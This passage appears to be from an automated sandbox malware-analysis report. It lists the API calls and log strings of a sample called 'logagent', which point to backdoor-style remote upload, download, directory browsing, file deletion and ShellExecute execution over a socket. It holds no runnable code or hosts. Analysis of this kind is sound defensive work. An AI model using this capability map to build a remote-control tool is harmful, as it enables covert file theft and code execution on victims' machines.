                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,00415948), ref: 00404547
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404550
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404559
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DC2
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E09
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E1A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E37
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D3D
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 00403E6B
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403E78
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 00403E99
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 00403EAA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403EBE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 00403EE9
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 00403EFA
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 00403F0E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F2C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F3D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F51
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F5D
                                  • GetLogicalDriveStringsA.KERNEL32 ref: 00403F74
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 00403F8A
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004159C4,00000000,00000002), ref: 00403F9C
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 00403FA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000), ref: 00403FD8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00403FE2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 00403FFC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00404008
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000002,0041B310,00000000), ref: 00404083
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,00000000), ref: 00404093
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 004040A3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 004040AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040C8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040E0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 004040FC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 0040410E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404148
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040415A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040416E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040417A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404187
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404342
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404378
                                  • StrToIntA.SHLWAPI(00000000), ref: 0040437F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004043A2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040470E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040471F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 00404728
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
                                  • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                  • API String ID: 1698304352-2559757301
                                  • Opcode ID: 8ccbc9fa486d0014629f56acd05822ce08dc54dd8e2ab9925d51204abb04f5b3
                                  • Instruction ID: cb52a323490428edf8fa9013e568b6c0705a1129d991cf782fce7d07dea18215
                                  • Opcode Fuzzy Hash: 8ccbc9fa486d0014629f56acd05822ce08dc54dd8e2ab9925d51204abb04f5b3
                                  • Instruction Fuzzy Hash: 4D528DB2910508EBCB05FBA1DC8ADEE773CFB54345F00456AF516A30A1EF785A84CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040477E Relevance: 88.8, APIs: 59, Instructions: 322filenetworkthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00404783
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                  • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                  • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                  • wcscmp.MSVCRT ref: 00404924
                                  • wcscmp.MSVCRT ref: 0040493C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                    • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,770A9F40), ref: 00404C1F
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(77052590,?,770A9F40), ref: 00404C2F
                                    • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,770A9F40), ref: 00404C39
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,770A9F40), ref: 00404C43
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                    • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                    • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                    • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                  • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                  • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
